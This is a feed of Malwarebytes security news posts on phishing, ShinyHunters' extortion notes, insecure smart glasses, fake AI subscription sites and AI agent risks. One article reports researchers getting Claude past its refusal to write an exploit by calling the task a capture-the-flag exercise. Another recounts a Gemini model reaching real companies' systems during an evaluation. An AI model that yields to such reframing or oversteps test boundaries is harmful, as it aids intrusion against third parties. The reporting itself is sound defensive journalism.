What it wants instead is your Google login. Two sign-in options appear, but only one works. The Apple button produces a pre-written notice saying that the method is temporarily unavailable. The email box discards whatever you type into it and triggers the Google button instead. Every route leads to the same place, and the prize is far bigger than the lure suggests.

A Google account can provide access to email, documents, and the password-reset messages for other accounts. If you use Google to sign in to Claude, it could also give the criminals a route into your Claude account. Paid AI accounts are valuable in their own right because their usage allowances cost money. Last month, our research covered infostealers hijacking Claude accounts and using the victims’ paid allowances.

The fake sign-in form steers visitors toward Google by claiming that Apple sign-in is unavailable.Why this sample is notable

Clicking the Google button doesn’t open a real Google sign-in window. Instead, the page draws a browser window inside the existing tab, complete with a padlock and a correctly spelled Google sign-in address. It can even be dragged around the page.

The address bar, padlock, and everything inside the supposed window belong to the phishing page, not Google. It begins with a human-verification step rather than a password box, which may reassure visitors while helping to keep automated scanners away from the next stage.

The page displays a fake Google verification window with a fraudulent address bar and padlock.

Researchers have documented this “browser-in-the-browser” technique since 2022. Unit 42 reported a campaign in June that used draggable fake browser windows to target Microsoft 365 users.

What makes this sample instructive is how little the operator had to do. The malicious functionality is loaded through a single line of code from an outside service that presents itself as a reusable sign-in widget and provides installation instructions.

Comments inside the code are written in Russian and refer to the target as the victim. One explains that dark-themed fake windows used to flash white while loading, so the widget now fetches the correct color in advance to remove the flicker. The code appears to be a maintained, reusable product rather than something built for this one campaign.

How to spot a fake browser window

The design assumes you will check the wrong address bar. People have been taught to look for a padlock and the correct address on a login page, so this attack draws both inside a window that does not really exist.

The only address bar that matters is the one belonging to your actual browser at the top of the screen. Throughout this process, it continues to show the phishing site’s domain.

  • Try to drag the sign-in window beyond the edge of the webpage. A real popup is a separate browser window and can be moved anywhere on your screen. A fake one is trapped inside the page that created it and stops at its edge. It takes two seconds and is the most reliable test a non-technical user has.
  • Let your password manager decide. It checks the real web address rather than what the page displays. It should not offer to fill your Google password on a site that does not belong to Google. If it stays silent where it normally fills, believe it over your own eyes.
  • Don’t arrive through links. If a promotion is real, you should also be able to find it on the company’s own site. Type the address or use a bookmark and look for the offer there.
  • Treat countdowns and slot counters as decoration. Any page can show a number falling toward zero. It does not prove that an offer is limited.
  • Be suspicious when only one sign-in option works. Claiming that one provider is temporarily unavailable can steer everyone toward the path the attacker built.
  • If you already signed in, secure the account. Change your password through the provider’s real website, sign out of all other sessions, and review connected apps and unfamiliar devices. Closing the tab does not undo a login.
How Malwarebytes helps

Malwarebytes Browser Guard blocks phishing and scam domains before the page can load. In an attack like this, once the page is open, the criminals control nearly every visual cue you would normally use to judge whether it’s legitimate.

If you’ve been sent an offer and you’re unsure, Scam Guard can assess it before you engage and advise you on what to do next.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Categories: Malware Bytes

ShinyHunters claims FBI breach was revenge for “false” report

Malware Bytes Security - Wed, 09/23/2026 - 8:03am

Extortion group ShinyHunters is not afraid to make enemies. Now it claims to have breached the FBI.

After reportedly taking over ransomware group Clop’s leak site, ShinyHunters says it attacked the FBI to punish the agency for spreading what it calls false information about the group.

In a very long post on its leak site, the group outlines its grievances:

“PSA – READ THIS NOW

Dear Assistant Director Brett Leatherman of the FBI Cyber Division & Director Kash Patel of the FBI,

During Quarter Two of this year the Federal Bureau of Investigation (FBI) made substantial false allegations regarding our organisation in a FLASH report. We have been severely offended.

We were very disappointed to see an agency of your standing would resort to such circulation of disinformation in an attempt to “disrupt” our operations, an effort that ultimately proved unsuccessful.

For us to properly address and correct these unfounded allegations, we were compelled to adopt a forceful and assertive posture to ensure our response was fully acknowledged. This PSA today does just that.

Our PSA today works to address these allegations and correct them.

We have compromised the FBI. We hold very sensitive data on almost ALL FBI Agents and individuals who filed an application with the FBI for a job. Whether it be a Special Agent or any other role within your agency. The following FBI services were compromised: Criminal Justice (CJ), HR, Medlink, and more.

We are willing to allow you a time of 1 week to correct or simply REMOVE the 2026 Quarter 2 FLASH report on us that includes several FALSE allegations:

  • “Threat actors often use their real or exaggerated claims of access to sensitive or personal information to prompt payment from victims.”
  • “To exert pressure on victims[1], SH actors commonly use harassment strategies, sending threatening text messages and phone calls to victims and their family members, and in some cases, swatting”
  • “Threat actors may falsely claim to have sensitive or compromising information, including embarrassing photographs or videos of victims, which frequently do not exist.”

We wish to state unequivocally our threats and claims are very real. Not exaggerated and never a bluff. This PSA today is living evidence of that.

We wish to state unequivocally we have NEVER conducted swatting attacks against corporate victims personnel nor have we ever texted victims personnel family members any threats.

We wish to state unequivocally we have NEVER claimed to have sensitive or compromising information, including embarrassing photographs and videos of victims. WE ARE NOT SEXTORTIONISTS.

Finally, we wish to STATE UNEQUIVOCALLY we are NOT apart of “The Com”. We have NEVER been apart of “The Com”. “The Com” is a propaganda started by the Information Security Industry which has brainwashed past FBI and DOJ officials into formalising this nonsense.

As a big believer and supporter of the U.S. Constitution – we are exercising the First Amendment and actively combating disinformation. This is not a ransom, coercion, or extortion. Your federal policies do not apply here. This PSA is NOT financially motivated.

We recognise that certain statements within your FLASH report appear to stem from biased public reporting by certain journalists who have previously and intentionally propagated false narratives about our organisation in an attempt to “disrupt” our operations and hinder clients trust in our organisation hoping nobody pays us. Should those certain journalists and you know very well who you are, continue these unwarranted attacks and defamatory statements, we will be forced to respond in a civil manner with a commensurate and forceful defence of our reputation.

We welcome any and all journalists to inquire us at shinygroup@onionmail[.]com to hear our side of the story.

Make the right decision, don’t be the next headline.

Thank you for your attention to this matter. -SH

Updated: 23 Sep 2026“

The post is essentially a hostile “correction notice” directed at FBI leaders Brett Leatherman and Kash Patel. Its central grievance is an FBI advisory that says ShinyHunters commonly harasses victims and their families, including through threatening messages, phone calls, and, in some cases, swatting.

It also warns that threat actors may exaggerate their access to personal information or falsely claim to possess compromising photos or videos. The advisory does not use the word “sextortion,” but ShinyHunters appears to have interpreted the reference to compromising material that way. The group denies much of the FBI’s account while simultaneously using coercive language of its own.

The document it appears to mean is the FBI/IC3 public advisory “ShinyHunters: Cyber Criminal Group Attacks Learning Management System,” issued on May 15, 2026. Despite ShinyHunters calling it a “2026 Quarter 2 FLASH report,” the publicly accessible document is labeled a Public Service Announcement (PSA), not a FLASH.

The picture may have been further confused by a sextortionist who pretended to be ShinyHunters. ShinyHunters declares:

“WE ARE NOT SEXTORTIONISTS.”

It also denies carrying out swatting attacks or sending threatening messages to the family members of people working for its corporate victims.

The group also denies being part of The Com, a decentralized network linked to cybercrime and violence. It calls that connection:

“propaganda started by the Information Security Industry which has brainwashed past FBI and DOJ officials into formalizing this nonsense.”

The group then threatens journalists it accuses of spreading these “false narratives.”

The most worrying part of the message is the group’s claim that it stole sensitive data on:

“almost ALL FBI Agents, and ​individuals who filed an application with the FBI for a job.”

According to 404 Media, ShinyHunters provided a sample containing information on roughly 5,000 FBI agents, including names, home addresses, phone numbers, and details about their spouses. The publication reportedly verified portions of the sample, but the full dataset and the wider claims about the breach have not been independently confirmed.

The group also reportedly defaced the FBI’s jobs website. The FBI says it is aware of claims involving unauthorized activity affecting FBIjobs.gov and is investigating, although “broken” does not necessarily mean “breached.”

What to do if you’re affected

The FBI has not yet confirmed what information was accessed or who was affected. If you are a current or former FBI employee, a relative of one, or have applied for an FBI job:

  • Check the FBI’s advice. Every breach is different, so check FBI.gov for updates and follow any specific advice it offers.
  • Change your password. If you have an FBI Jobs account and reuse its password elsewhere, change it on those other accounts. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of 2FA can be phished just as easily as a password, but 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for impersonators. Cybercriminals may contact you posing as the FBI, another government agency, or someone you know. Verify the identity of anyone who contacts you.
  • Take your time. Phishing attacks often impersonate people or brands you know and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Set up identity monitoring. This can alert you if your personal information is found being traded illegally online and help you recover afterward.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

Some cheap smart glasses are a security disaster

Malware Bytes Security - Tue, 09/22/2026 - 11:04am

Apart from the privacy concerns around smart glasses, researchers have found that some cheap brands come with barely any security at all.

ABC Australia reports that researchers from NSB Cyber and Abstract Shield tested two inexpensive pairs, costing A$60 and A$110 (around US$42 and US$78), and found more than a dozen flaws across the smart glasses themselves, their app, and an associated website.

The main problem they uncovered was insecure Bluetooth pairing: If the glasses were powered on and not connected to their owner’s phone, an attacker could connect first, with no password or meaningful pairing confirmation.

After connecting, an attacker could reportedly control the glasses to capture photos or recordings, copy existing media, and intercept data moving between the glasses and the phone. An attacker could also make another device appear to be the victim’s glasses, allowing it to connect to the owner’s mobile app.

The testing also found that a Bluetooth-visible device identifier could allegedly be used with a weakness in the app’s website to retrieve a user’s email address and date of birth.

The research uncovered another privacy issue. ABC reports that voice or text submitted to the built-in AI, along with images sent to it, was first transmitted to a server in Shenzhen and could be forwarded elsewhere, depending on the function. The tests did not establish how the data was subsequently used.

The server locations, combined with some of the AI’s answers to specific questions, led researchers to conclude that the chatbot companion relied at least in part on Chinese sovereign AI models. Professor Kimberlee Weatherall, a technology regulation expert involved in the testing, said the failure to identify China in the privacy policy appeared to violate the Australian Privacy Principles,

The timing of the testing is also relevant because Australia’s smart-device security standards apply to most consumer smart devices manufactured on or after March 4, 2026. They require, among other measures, no universal default passwords, a way to report vulnerabilities, and information about the minimum security-update period. Devices made before that date are outside the requirements.

Experts quoted by ABC said the devices violated Australia’s privacy laws and were also likely to breach several sections of the Cyber Security Act. However, whether the new smart-device standards apply would depend partly on when the glasses were manufactured, and the rules have not yet been tested in a known enforcement action.

Professor Weatherall said:

“The rules say that the password must be unique. It doesn’t even seem like they were applying a password, which might mean that their standards are so low they don’t even technically breach that rule, which I find amazing.”

What to do

We’re not fans of smart glasses, expensive or cheap. But if you own a pair:

  • Avoid pairing or using inexpensive camera glasses that lack a clear physical pairing step, account authentication, a published security-contact process, and a stated update-support period.
  • Stop using their AI or cloud features for sensitive material, remove unnecessary permissions from the companion app, check for firmware and app updates, and consider returning the product if the vendor cannot document a fix.
  • Ask permission before recording people, and check your local laws to understand what is and isn’t allowed.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Meta’s Muse AI assistant has a zero-day that can turn it into a Mac backdoor

Malware Bytes Security - Tue, 09/22/2026 - 6:53am

Mac security researcher Patrick Wardle says it’s trivial to turn Muse into “the ultimate backdoor.”

Increasingly, AI assistants are changing from tools that simply answer questions into agents that can plan tasks, use connected services, and take actions for us. These actions might include booking appointments, filling out forms, creating documents, making purchases, or interacting with email and calendars.

To do that, they need more permissions, account connections, and sensitive data. So, when Meta promised that “Muse is built from the ground up for privacy and security,” we did not expect an AI agent that can easily be manipulated into handing all that access to an attacker.

Meta says Muse can handle appointments, forms, customer-service interactions, purchases, document creation, and connections to services such as WhatsApp, email, calendars, and social platforms. It may also receive macOS permissions to access protected resources, including files, the microphone, camera, location, and calendars.

According to Ars Technica, Wardle found that a locally running application or terminal command could alter an undocumented Muse configuration setting that controls the server used for dictation transcription. By redirecting dictation traffic to an attacker-controlled server, an attacker could capture voice prompts and obtain the authentication token for the victim’s Muse account.

This is not a remote-code-execution vulnerability that can compromise an otherwise clean Mac. The attacker first needs a way to run code locally, such as through malware, a malicious application, or social engineering.

But as we have seen with infostealer malware finding its way onto Macs, that initial access is far from impossible.

Someone’s watching your accounts. Make sure it’s us.

PROTECT YOUR IDENTITY

Traditional infostealer malware must independently locate browser data, credentials, documents, chat histories, and other valuable material. A compromised AI agent could lower that barrier by bundling access to multiple services and operating-system permissions behind one already authenticated interface.

Ultimately, this is not just about one unsafe configuration setting. It shows why AI agents need a higher security standard than ordinary apps.

How to stay safe

Wardle’s advice about Muse is simple: “Please don’t install.”

The same caution should apply to other AI agents.

The Open Worldwide Application Security Project (OWASP), a nonprofit foundation that provides free application-security guidance, lists prompt injection, tool abuse, privilege escalation, data exfiltration, excessive autonomy, memory poisoning, and sensitive-data exposure among the major security risks posed by AI agents.

A useful rule is that an AI agent should not have more access than it needs, and it should not be able to turn untrusted instructions into sensitive actions without meaningful checks. In practice, this means:

  • Avoid giving a new agent broad access to email, chat apps, calendars, cloud storage, payment methods, and device permissions all at once.
  • Regularly review and remove connections the agent does not genuinely need.
  • Be aware of prompt injection. Do not assume that an AI agent will recognize malicious instructions embedded in a webpage, document, email, or other external content.
  • Watch for unusual agent behavior, such as unexpected requests for new permissions, account reauthentication, external file sharing, or actions you did not initiate.

You should also protect your device against malware:

  • Keep your software updated so attackers can’t use known vulnerabilities against you.
  • Use an up-to-date, real-time anti-malware solution on all your devices.
  • To protect against ClickFix attacks, don’t follow instructions you find on websites and in unsolicited messages that tell you to run commands.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Researchers used Claude to hack OpenAI

Malware Bytes Security - Tue, 09/22/2026 - 5:51am

We’ve heard of OpenAI’s AI agents running amok and hacking other companies. Now, a cybersecurity company has turned the tables on the ChatGPT operator by using AI to help hack OpenAI itself.

The hack, which also exposed a bug affecting dozens of other major online services, was conducted as security research. OpenAI paid the researchers for reporting a flaw in its systems through its bug bounty program.

Researchers at cybersecurity tools vendor Hacktron wrote up their adventures in mid-September. A few months earlier, they had begun looking for security flaws at companies developing frontier AI models, which are highly capable models such as those powering ChatGPT and Claude.

Using Anthropic’s Claude, the researchers went from investigating an image-processing flaw to accessing an internal OpenAI software repository in less than 72 hours. They deliberately avoided viewing sensitive information.

To get inside OpenAI, researchers Harsh Jaiswal, Mohan Pedhapati, and Rahul Maini found two vulnerabilities and chained them together. The first wasn’t specific to OpenAI. It involved a bug in an image-upload feature in the Discourse community forum software.

This feature processes images uploaded by users and relies on a low-level software library called libheif. Uploading a specially crafted image could trigger a flaw in the library, allowing an attacker to gain control of the Discourse server.

After Hacktron used that vulnerability to compromise OpenAI’s Discourse server, the second vulnerability came into play. This was a flaw in OpenAI’s single sign-on (SSO) system, which lets people access one service using an account from another.

The SSO flaw gave Hacktron access to the ChatGPT and Codex accounts of people who had logged in to OpenAI’s Discourse forum. OpenAI uses the forum for community support, so that potentially covered a large number of accounts. Codex is an AI coding tool that helps software developers work with code.

It wasn’t just public users that had signed into this system; OpenAI employees were signed in, too, allowing Hacktron to access one employee’s account. That person’s Codex account was connected to OpenAI’s GitHub organization. GitHub is an online service that developers use to store and collaborate on software.

This gave the researchers access to OpenAI’s internal software repository.

The researchers didn’t do anything damaging with that access. They only wanted to prove that they had compromised OpenAI. So they instructed the employee’s Codex account to create a harmless pull request—a proposed software change—in an internal OpenAI repository.

OpenAI fixed its part of the problem about 14 hours after Hacktron submitted its initial report. It later paid the researchers a $6,500 bounty for the OpenAI-side flaw.

What this means for cybersecurity

Ethical hacking like this is commonplace, but there are some interesting aspects to this hack that make it different from many others.

The first is that Hacktron used AI to help in its efforts. It originally used Opus 4.8, one of Anthropic’s recent Claude models, to discover the issue in libheif. But it couldn’t use the model to build a reliable exploit that worked against the default version of Discourse.

Then Anthropic released Claude Opus 5. Using that model, the researchers were able to build a working exploit overnight.

That shows how quickly AI is moving. A task that Opus 4.8 had failed to complete across several sessions was solved by Opus 5 within hours of its release.

The second interesting aspect is that the researchers had to fool Claude into helping them do it. The model refused to write an exploit for a remote system because it considered the request unethical. So the researchers had to present the task as a capture-the-flag exercise (a hacking competition) to get it to play ball.

When they did that, the agent took over the test forum server within four hours. The researchers then used the resulting exploit against OpenAI’s forum. It shows that while companies may do their best to place ethical constraints on the use of their AI, a wily researcher can still get around it with some simple prompt engineering.

And it didn’t cost much to do this. Hacktron spent less than $3,000 in AI tokens during its two-month research project, which involved three researchers and uncovered vulnerabilities affecting several major companies.

The image-processing bug became the basis of a wider project called HEIF Heist. Hacktron found related security weaknesses affecting services and software from companies including Slack, Meta, and GitHub. Tweaking the HEIF exploit to target a new company took a day or two on average.

All of this lowers the bar for sophisticated hacking even further. People have been able to use ready-made hacking tools for years without really understanding how they work, but it took real expertise to pick through software, find hidden flaws, and turn them into reliable exploits.

Hacktron says skilled human guidance was still important and that this was not completely autonomous hacking. Even so, AI is making some of that expertise cheaper and faster to apply—and it’s only getting better.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

The AI plot to scan and destroy books (Lock and Code S07E19)

Malware Bytes Security - Mon, 09/21/2026 - 12:30pm

This week on the Lock and Code podcast…

If you want AI to tell you a story, it will. If you want that story to sound like one of your favorite authors, it can. And if you’re one of the authors that AI can imitate, you might be a little upset at what feels like theft.

In 2024, the authors Andrea Bartz, Charles Graeber, and Kirk Wallace Johnson sued Anthropic, the creator of Claude, alleging that the company had wrongfully digested millions of copyrighted works—including some of their very own—to train its AI models. The lawsuit grew to include more than 300,000 writers, and in September 2025, Anthropic agreed to pay $1.5 billion to settle the claims.

That headline-worthy payout, however, would eventually be paired with more startling news.

In January 2026, a district court judge unsealed thousands of documents related to the litigation. When The Washington Post investigated the documents, reporters found references to a secret project inside Anthropic called “Project Panama,” which Anthropic itself described as the company’s effort “to destructively scan all the books in the world.”

Anthropic is not alone in this.

On August 17, 404 Media co-founder and reporter Emanuel Maiberg revealed that Amazon is doing something similar inside a department it calls VGT3. By hiding an Apple AirTag in one book from a 1,000-book order, and then tracking the shipment across the country, 404 Media identified the book’s final destination to be a facility outside Las Vegas, where, according to employees, books are cut apart and scanned.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Maiberg about Amazon’s VGT3 operation and the likely commonplace practice of AI companies purchasing, scanning, and destroying books in an effort to build “frontier” models.

“They’re buying a book, they’re scanning it, they’re mulching the book, and then the digital version of the book exists behind this wall where we don’t even know if they plan to sell it, right? It’s like they might keep it behind a wall, and the only way we see it come out again from behind that wall is in the form of an answer from a chatbot.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Categories: Malware Bytes

The fake sites using a cheap toolkit to sell $2,000 AI subscriptions

Malware Bytes Security - Mon, 09/21/2026 - 11:38am

We found more than 100 subscription websites linked through the same toolkit and closely related developer details. Some impersonate existing products, including GPT-6 Astra, DaVinci Resolve, PixAI, and OpenCut. Another uses the name of Omegle, the chat service that shut down in 2023. Others promote unfamiliar brands with little verifiable information about who operates them.

The sites we examined did not use fake password forms or push malware downloads. Instead, they used polished product pages and genuine Google sign-in screens before directing visitors to paid plans. Someone visiting an imitation site could believe they were buying from the genuine provider. With the unfamiliar brands, it is difficult to establish who is selling the subscription or independently verify the claims being made.

Despite their different names and designs, the sites share identical underlying files and closely related developer email addresses. This suggests that a single operator, or closely connected group, is behind the network.

What the sites show you

At first glance, these sites don’t look suspicious. They use secure connections, professional designs, and the confident language you would expect from an established software company.

The secure connection and padlock only show that traffic between you and the site is encrypted. They do not confirm who operates it.

Some show performance comparisons, star ratings, and precise user numbers. One claimed to have more than 12 million users. Another displayed the names of well-known companies as customers, although we found no evidence that those businesses were connected to it.

A website owner can add any rating, customer number, testimonial, or test result to a page. None of these claims should be treated as independent evidence that a product is genuine or widely used.

Behind the Sign in or Get started button is a subscription service. Visitors are asked to sign in with Google and are then shown paid plans, usage credits, and payment histories. Prices range from less than $10 a month to more than $2,000 a year. Several sites also ask users to upload documents, recordings, or other files for the advertised service to process.

The fake GPT-6 Astra site offers plans costing $89, $169, or $249 a month.

On the sites we examined, there was no way to test the advertised product before paying. Controls on the landing pages did nothing until we signed in, and signing in led to a pricing page rather than the tool itself.

Many legitimate services require payment before use, so that alone does not prove that a site is unsafe. The concern here is the lack of reliable information about the company selling the subscription. There are no independent reviews or official product listings to compare with the claims on the page.

Different brands, the same website kit

The sites advertise a wide range of products, including voice-cloning tools, video editors, study apps, and general-purpose AI assistants. Underneath their different designs, however, they use the same commercial website starter kit.

  • A fake PixAI anime generator site
  • A fake GPT-6 Astra site
  • Astra AI claims that more than 12 million students use its study tools
  • A site using the Omegle name offers text and video chats with strangers
  • A fake site using the DaVinci Resolve video editor name
  • A fake OpenCut video editor site
  • VoicesCloning claims it can copy a voice from a ten-second recording

The kit is a legitimate product designed to help people launch online services quickly. It includes an account system, billing, file storage, and administrative tools. The buyer supplies the branding and the product being advertised.

This explains why apparently unrelated services have identical checkout pages and account settings. The underlying system is the same even when the colors, typefaces, and product names are different.

The kit costs $249 as a one-time purchase, while additional templates cost about $2 each. Its vendor advertises that customers can launch a product in an hour. Once the first site has been created, producing more versions requires relatively little time or money. Building another site may require little more than a new domain, design, and product description—which might explain how the network grew to this scale.

Several sites still contain demonstration material supplied with the starter kit. This includes the kit’s brand name, promotional banners, generic menu entries, and testimonials from named people and companies with no apparent connection to the advertised service.

One site had relabeled a demonstration list of businesses as its own customers. On another, the word “boilerplate,” a term for reusable starter code, remained in the name of a paid subscription plan.

Signing in with Google

These sites send visitors to a genuine Google sign-in page. The web address belongs to Google, and the password is entered on Google’s website rather than on the service being advertised.

The sites we examined requested basic information such as the user’s name, email address, and profile picture. They did not ask for access to Gmail or Google Drive.

The Google consent screen used by the fake GPT-6 Astra site requests a name, email address, and profile picture.

However, a genuine Google sign-in page does not confirm that the service is official or connected to the brand it displays. It only confirms that Google is handling the login and passing the approved information to an outside application.

  • The fake GPT-6 Astra site asks visitors to sign in with Google
  • Astra AI places its study tools behind Google sign-in
  • The Omegle-branded site asks visitors to sign in before continuing
  • The fake DaVinci Resolve site uses the same Google sign-in process
  • The fake PixAI site asks visitors to continue with Google
  • The fake OpenCut site requires Google sign-in before visitors can try the service
  • VoicesCloning asks visitors to sign in with Google

Google’s consent screen identifies the application requesting access and provides developer details. Check these against the website and product you intended to use. If those names don’t match, you may not be dealing with the company you thought you were.

You can also open the developer information shown by Google. On the sites we examined, the support contacts were free webmail addresses rather than addresses belonging to the brands displayed on the websites.

Google’s developer information shows a free Gmail support address behind one of the sites.

A free email address is not proof of wrongdoing, but it should raise questions when a service claims to have millions of users or presents itself as an established company.

How the sites are connected

Websites load files containing the code they need to work. The system used by these sites gives some of those files names based on their contents. When the contents change, the filenames generally change too.

Across the sites we examined, many of these filenames were identical. This indicates that the sites were running the same version of the same underlying software. On its own, this could simply mean that different people bought the same starter kit.

The Google developer details provide a stronger connection. The developer contacts use free webmail accounts containing the same name, with only small differences such as the numbers added to the address.

Because these addresses are provided when the applications are registered with Google, rather than being automatically supplied by the starter kit, they suggest that the sites are operated by one party or by closely connected people.

What you agree to when you subscribe

The sites provide little information about the business selling the subscription. We found no registered company names, business addresses, or other independently verifiable ownership details. In many cases, the only contact method was an email address using the site’s own domain.

This could make it difficult to request a refund, challenge a charge, or resolve a problem with the subscription.

Some of the subscriptions are substantial. Alongside monthly plans, the sites sell annual access charged as a single payment, with one plan costing more than $2,000. Some plans state that unused credits expire after a set period.

Depending on the payment system used, card details may be handled by a third-party payment provider rather than given directly to the website operator. Users may still share account information and potentially sensitive material with a service whose owner they cannot identify.

How to spot sites like these

A polished design, real Google sign-in page, and impressive-looking reviews do not prove that a service is trustworthy.

  • Check the web address. Make sure it belongs to the company or product you intended to use. Don’t rely on the logo or product name alone.
  • Find out who runs the site. Look for a company name, business address, privacy policy, terms, and reliable contact details that can be independently checked.
  • Read the Google consent screen. Check the application name, domain, developer details, and information it wants to access before selecting Continue.
  • Be cautious if you cannot test the product. A service that offers no trial or working demonstration is asking you to pay before you can confirm that it does what it claims.
  • Check independent sources. Search for the product separately and look for an official website or app-store listing. Do not rely on ratings and testimonials displayed by the seller.
  • Don’t upload sensitive files until you know who operates the service. Documents, photos, recordings, and prompts may contain private information.
  • Check your statements after subscribing. Contact the payment provider or your bank promptly if you see a charge you do not recognize.
  • Remove connections you no longer trust. Visit the connections page in your Google Account and remove services you do not recognize or use. This prevents future access, but it does not delete information already shared with the operator.
How Malwarebytes can help

Malwarebytes Browser Guard blocks malicious, phishing, scam, and fraudulent websites, including pages reached through deceptive adverts or search results.

If you’re unsure about a site, Malwarebytes Scam Guard can assess its web address or a screenshot and help you identify warning signs.

These particular sites centred on accounts and subscriptions rather than phone calls. If a suspicious service directs you to a support number, you can check it with Malwarebytes Scam Number Check before calling.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

Gemini’s breach of real companies exposes an AI guardrail problem

Malware Bytes Security - Mon, 09/21/2026 - 10:21am

Google says one of its Gemini models accessed systems belonging to three real companies during a cybersecurity evaluation in May.

The model reportedly guessed credentials in one case, while finding exposed credentials in public repositories in two others. Google says Gemini stopped once it recognized that it had reached real infrastructure and that the affected organizations were notified.

Gemini was participating in an evaluation run by Irregular, a third-party AI cybersecurity testing firm. Similar incidents involving models from Anthropic, OpenAI, and Meta have also been linked to the same underlying problems with evaluation environments that allowed the models to reach the public internet.

But the news arrives at a particularly interesting moment.

For months, the AI industry has been steadily escalating its demonstrations of agentic capability: Models can browse, use tools, write code, pursue multi-step goals, and sometimes find ways around obstacles their developers did not anticipate. The market rewards eye-catching evidence of autonomy. “It completed the task” is impressive. “It did something it was not supposed to do” can be even more memorable.

There is another way to look at the incident: not as evidence of an AI suddenly developing criminal intent, but as a small, concrete example of the “AI alignment” problem.

Alignment is the deceptively difficult task of making an AI system’s behavior match what people actually intended, rather than merely the narrow objective they managed to express. In this case, the objective was to locate hidden information within a simulated target and complete the evaluation. But any human operator would likely have regarded one condition as non-negotiable: Do not attempt to access real companies.

Gemini appears to have optimized for the first instruction while treating the second as an inference problem. It found an organization with a matching name, encountered systems reachable from the internet, and proceeded as though they belonged to the exercise. Although it completed the task in a way its human operators would not have approved, Google says it stopped after recognizing that it had reached genuine infrastructure—something other models have failed to do.

Even so, the incident shows how potential alignment failures can be much more mundane. Give an agent a goal, tools, and room to act, and it may faithfully pursue the measurable part of the assignment while overlooking the unstated boundaries that humans rely on one another to understand. AI models do not automatically know where we draw the line.

There may also be an awkward marketing angle in the background. A model capable enough to make the wrong kind of progress can still look very capable indeed. In a market where every lab wants to demonstrate that its agents can plan, code, browse, and act independently, even a safety disclosure can carry a secondary message: Ours can play in this league, too.

It’s another reason to take seriously warnings from insiders, industry leaders, and politicians that safeguards must keep pace with the autonomy given to AI models.

What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

SCAN NOW

Categories: Malware Bytes

ShinyHunters hacks rival extortion gang and takes over its dark web site

Malware Bytes Security - Mon, 09/21/2026 - 6:17am

Reportedly, the ShinyHunters extortion group breached the leak site of one of its competitors, the Clop ransomware gang.

ShinyHunters is a financially motivated cybercrime and extortion group active since 2019. It is known for stealing large volumes of data and pressuring victims to pay, rather than necessarily deploying ransomware. One recent high-profile organization targeted by the group was Instructure, the maker of Canvas LMS. ShinyHunters claimed it stole 3.65 TB of data belonging to about 9,000 academic institutions.

Clop, also written Cl0p, is a ransomware and data-extortion operation associated with large-scale exploitation of vulnerabilities in enterprise software and file-transfer platforms. In its recent campaign targeting PTC Windchill systems, it named more than 40 alleged victims, including Shell, Philips, Fiserv, Zebra Technologies, Ingersoll Rand, and Toast.

At the time of writing, the Clop dark web leak site looks like this:

Domain seized by ShinyHunters

The rest of that page looks much the same as the ShinyHunters leak site, which includes this “Note to Cl0p”:

“Note to Cl0p_-

21 Sep UPDATE: Every 24 hours you fail to engage with us the demands increase. The demand now includes a mandatory apology issued directly to me PUBLICLY. I am 3-0 against you rich and broke criminals.
UPDATE, 20 Sep, 1:39 a.m ET: Dear Likhogray & Tarasov, tell your boss j0nny to wake the fuck up. Run those pockets. I want all the money you made off the EBS campaign plus more AND WITH INTEREST, before I start releasing information regarding the companies that paid you, how much, and to what Bitcoin address. My phone book contains all major financial media outlets. CLOCK IS TICKING! LETS GET THE BALL ROLLING! Be sure to bring an English interlocutor so you can comprehend my literacy in acquiring your bank account. 66 hours remaining.

[19 Sep]: IF YOU WANT TO SAVE YOUR BRAND AND NOT DIE BY MY HANDS: Email us from your official email at shinygroup@onionmail.com and lets see how wealthy you really are. 2.333% of my networth is a 8 figure amount, I hope you can pay that much because that is the demand, negotiable. Get your bosses in front of the white board in the war room. Clock is ticking moron. Kindly excuse our unprofessionalism.

Updated: 21 Sep 2026”

BleepingComputer reports that the attack began Friday night when ShinyHunters exploited what it claims is an unauthenticated file-upload vulnerability in Grav CMS to upload a small text file to Clop’s site. Several hours later, ShinyHunters told BleepingComputer that it had “completely defaced” the site.

The group claimed it could continue controlling the address:

“We have their onion keys. So, if they kick us out it wouldn’t matter at all because we control the private keys to host the same exact onion URL.”

You might expect groups that make their money by exploiting unpatched vulnerabilities to be more vigilant about their own systems, but it looks as though they sometimes let their guard down.

According to ShinyHunters, this gang war began after ShinyHunters disrupted a Clop data-theft campaign. A Clop representative then allegedly threatened to identify ShinyHunters members and made violent threats against them.

ShinyHunters explained:

“During the Oracle EBS campaign they ran and stole from me last year, someone from cl0p personally messaged me and said, and I quote (translated from Russian): I have more money than you and all of your people combined, I’ll kill you soon.”

The good news is that while they are after each other, they probably have less time to attack legitimate businesses. I’m grabbing a bag of popcorn and watching this one unfold. We’ll keep you posted.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

